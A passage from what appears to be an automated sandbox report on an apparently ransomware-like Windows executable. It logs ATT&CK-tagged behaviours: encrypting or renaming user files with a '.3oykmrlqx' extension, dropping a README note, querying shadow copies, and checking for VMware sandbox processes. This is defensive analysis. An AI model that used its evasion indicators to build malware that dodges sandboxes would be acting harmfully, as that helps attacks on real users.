\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Saved Games\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Pictures\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\OneDrive\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Music\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Links\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VBoxGuestAdditions\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VBoxGuestAdditions\\3OYkmrLQx.README.txt\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\VBoxGuestAdditions\\\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\WINSPOOL.DRV\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" trying to access non-existent file \"C:\\8F46B1FEA15369E70B8B3919DB81D2CD4D7428C75A5208AA0313A03E8B938E21.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\msn websites\\msn autos.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\msn websites\\msn entertainment.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\msn websites\\msn money.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\msn websites\\msn sports.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\msn websites\\msn.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\msn websites\\msnbc news.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\microsoft websites\\ie add-on site.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\microsoft websites\\ie site on microsoft.com.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\microsoft websites\\microsoft at home.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\microsoft websites\\microsoft at work.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\microsoft websites\\microsoft store.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\links for united states\\gobiernousa.gov.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\links for united states\\usa.gov.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\favorites\\links\\web slice gallery.url.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\downloads\\0ernyla.gif.3oykmrlqx\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" writes file \"c:\\users\\%osuser%\\downloads\\0n7wbcx6f.rar.3oykmrlqx\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\LSA\\ACCESSPROVIDERS\"; Key: \"MARTAEXTENSION\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"COPYFILEBUFFEREDSYNCHRONOUSIO\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"COPYFILECHUNKSIZE\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SYSTEM\"; Key: \"COPYFILEOVERLAPPEDCOUNT\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"3OYkmrLQx.README.txt\" has type \"ASCII text with CRLF LF line terminators\"- [targetUID: 00000000-00002940]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Able to identify sandbox environment running process\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Possibly tries to evade analysis by sleeping many times", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"FreeLibrary\" (Indicator: \"FreeLibrary\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\desktop.ini\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\AAAAAAAAAAA\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\AAAAAAAAAAA\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\BBBBBBBBBBB\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\BBBBBBBBBBB\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\CCCCCCCCCCC\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\CCCCCCCCCCC\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\DDDDDDDDDDD\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\DDDDDDDDDDD\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\EEEEEEEEEEE\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\EEEEEEEEEEE\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\FFFFFFFFFFF\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\FFFFFFFFFFF\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\GGGGGGGGGGG\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\GGGGGGGGGGG\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\HHHHHHHHHHH\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\HHHHHHHHHHH\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\IIIIIIIIIII\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\IIIIIIIIIII\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\JJJJJJJJJJJ\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\JJJJJJJJJJJ\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\KKKKKKKKKKK\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\KKKKKKKKKKK\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\LLLLLLLLLLL\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\LLLLLLLLLLL\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\MMMMMMMMMMM\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\MMMMMMMMMMM\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\NNNNNNNNNNN\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\NNNNNNNNNNN\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\OOOOOOOOOOO\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\OOOOOOOOOOO\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\PPPPPPPPPPP\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\PPPPPPPPPPP\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\QQQQQQQQQQQ\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\QQQQQQQQQQQ\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\RRRRRRRRRRR\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\RRRRRRRRRRR\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\SSSSSSSSSSS\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\SSSSSSSSSSS\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\TTTTTTTTTTT\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\TTTTTTTTTTT\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\UUUUUUUUUUU\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\UUUUUUUUUUU\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\VVVVVVVVVVV\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\VVVVVVVVVVV\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\WWWWWWWWWWW\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\WWWWWWWWWWW\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\XXXXXXXXXXX\"\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" renamed original file\"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\XXXXXXXXXXX\" to \"C:\\$Recycle.Bin\\S-1-5-21-2092356043-4041700817-663127204-1001\\YYYYYYYYYYY\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-201", "type": 2, "relevance": 1, "name": "Contains ability to query system locale (API string)", "description": "Found reference to API \"GetLocaleInfoW\" (Indicator: \"GetLocaleInfo\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")", "origin": "File/Memory", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-666", "type": 2, "relevance": 1, "name": "Able to identify sandbox environment running process", "description": "Found string \"VGAuthService.exe\" (Indicator: \"VGAuthService.exe\"; Source: \"00000000-00002940.00000001.249813.00420000.00000004.mdmp, 00000000-00002940.00000001.249813.0049A000.00000004.mdmp, 00000000-00002940.00000002.251733.00420000.00000004.mdmp\")\n Found string \"vmtoolsd.exe\" (Indicator: \"vmtoolsd.exe\"; Source: \"00000000-00002940.00000001.249813.00420000.00000004.mdmp, 00000000-00002940.00000001.249813.0049A000.00000004.mdmp, 00000000-00002940.00000002.251733.00420000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-450", "type": 2, "relevance": 1, "name": "Contains ability to determine if process is running under WOW64 (API string)", "description": "Found reference to API \"14953217949,1924,3147,,IsWow64Process,kernel32.dll,\"252:51:09.465\",RX=0,PX=0\" (Indicator: \"IsWow64Process\"; Source: \"00000000-00002940.00000001.249813.00420000.00000004.mdmp, 00000000-00002940.00000002.251733.00420000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebd476b8cd450000f0fd7f9a5c427700e0fd7f00f1220044f0fd7f00000000400000003f0000001500000000f0fd7ff4f02200c15c4277608249771500000000f0fd7f9a5c427700e0fd7f18f12200578941778083497713173075d8ebd476 (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000200000000000000880000000000000028f12200459dbb7600002d00000000008000000002000000000023009c1d82733cf122006c22827380000000d3228273dcf0827358f12200741d8273dcf082730000000088f2220000000000 (UID: 00000000-00002940)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineW\" (Indicator: \"GetCommandLine\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"OpenMutexW\" with parameter \"Global\\e50694f96d8d5aead5eff8df3d17e2e7\" - (UID: 00000000-00002940)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-433", "type": 2, "relevance": 1, "name": "Contains ability to execute a WMI query", "description": "Found string \"SELECT * FROM Win32_ShadowCopy\" (Indicator: \"select * from \"; Source: \"00000000-00002940.00000001.249813.00420000.00000004.mdmp, 00000000-00002940.00000002.251733.00420000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"IsWow64Process\" with parameter \"2940\" - (UID: 00000000-00002940)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000650037003000620038006200330039003100390064006200380031006400320063006400340064003700340032003800630037003500610035003200300038006100610030003300310033006100300033006500380062003900330038006500320031002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b41779d9f5177d8ebd476ac0142000000420000000000000000001c00700002000000000000000000000000000000000000001d006b00020000000000000000000000606f420000000000200000000000000000000000 (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000033006500380062003900330038006500320031002e006500780065000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ff2b4177499f5177020000000c022d0000002d0038004600010000000000000000000000000000000000000039003500010000000000000000000000000000000000000058032e0000000000 (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000067626ed31ce9220028ee2200fcff1d7300000000ca921d7300f61d73b56e1c7393616ed302000000fcdd1e7348d81e730000000000000000000000000000000000000000000000000000000030dd1e7300000000403c1c7300000000dc331c7328d81e73000000000000000000000000000000000000000093616ed308f1220059001e73 (UID: 00000000-00002940)\n \"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004177859f517702000000a4012d0000002d0050012d0003000000548c2d0050012d0000004200000000001d006b005d000000009f517750012d00ac01420038d82f00200000006100000016008e0004000000506c4200706d4200003c4600187142000000000061000061c4002d00f60200f4606f4200cd733200000000008000000000000000f60200f438d82f0000000000e0f0220068702d0070f0220080f4bb7600002d000000000089f4bb76ad4f76cc02000000e4f02200e0f022002cde1e73a8f1220095e13d77f57d3200feffffff34f02200c83ac576a8f02200d58cbd76 (UID: 00000000-00002940)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002940)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"8f46b1fea15369e70b8b3919db81d2cd4d7428c75a5208aa0313a03e8b938e21.exe\" (Path: 